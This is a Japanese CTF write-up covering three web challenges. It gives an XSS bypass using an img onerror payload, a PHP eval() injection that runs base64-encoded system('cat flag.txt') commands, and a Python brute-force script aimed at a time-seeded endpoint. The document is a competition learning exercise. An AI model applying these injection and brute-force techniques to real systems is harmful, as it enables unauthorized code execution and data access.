taskCTF: Write up
Web
Caesar Cipher Translator
"><script>alert("TEST");</script>
と入力すると
"><fpevcg>nyreg("vawrpgrq");</fpevcg>
<script>
タグ使わない方法ということで
"><img src=1 onerror='alert("injected")'/>
flag: taskctf{n1ce_inject10n!}
Evil Eval
<?php $result = ""; if (isset($_GET['data'])) { $data = $_GET['data']; $raw = base64_decode($data); eval('$result = ' . $raw . ';'); } ?> <html> <head> <meta charset="utf-8"> <title>result</title> </head> <body> <h1>結果</h1> <p><?= $result ?></p> </body> </html>
$ echo -n 'system("ls");' | base64 c3lzdGVtKCJscyIpOw== $ echo -n 'system("cat flag.txt");' | base64 c3lzdGVtKCJjYXQgZmxhZy50eHQiKTs=
flag: taskctf{eval_1s_b4d_h4bit}
Gacha
func gachaHandler(w http.ResponseWriter, r *http.Request) { seed := r.FormValue("seed") if len(seed) == 0 { seed = "1" } seedInt, err := strconv.Atoi(seed) if err != nil { http.Error(w, err.Error(), http.StatusInternalServerError) return } // get current time(HHmmss) jst := time.FixedZone("Asia/Tokyo", 9*60*60) nowStr := time.Now().In(jst).Format("150405") log.Println(nowStr) nowInt, err := strconv.Atoi(nowStr) if err != nil { http.Error(w, err.Error(), http.StatusInternalServerError) return } sm := (seedInt + nowInt) % 100000 log.Println(sm) var flag map[string]string if sm == 1337 { flag = map[string]string{ "flag": "taskctf{this_is_dummy_flag}", } }
与えられたファイルを読むと(seedInt + nowInt) % 100000
が1337になればflagが出てくる。
またseeed値はユーザが勝手に設定できるっぽい。
適当にスクリプト書いて総当りしてたらflag出てきた。
import requests url = "http://34.82.49.144:3334/?seed=" for i in range(177770,10000000): tmp = url + str(i) print("url: ",tmp) res = requests.get(url=tmp) print(res.text)
{"flag":"You might not have a luck...","sum":"1329"} url: http://34.82.49.144:3334/?seed=177785 {"flag":"You might not have a luck...","sum":"1330"} url: http://34.82.49.144:3334/?seed=177786 {"flag":"You might not have a luck...","sum":"1332"} url: http://34.82.49.144:3334/?seed=177787 {"flag":"You might not have a luck...","sum":"1333"} url: http://34.82.49.144:3334/?seed=177788 {"flag":"You might not have a luck...","sum":"1334"} url: http://34.82.49.144:3334/?seed=177789 {"flag":"You might not have a luck...","sum":"1335"} url: http://34.82.49.144:3334/?seed=177790 {"flag":"taskctf{Y0u_h4ve_4_gre4t_luck}"}
flag: taskctf{Y0u_h4ve_4_gre4t_luck}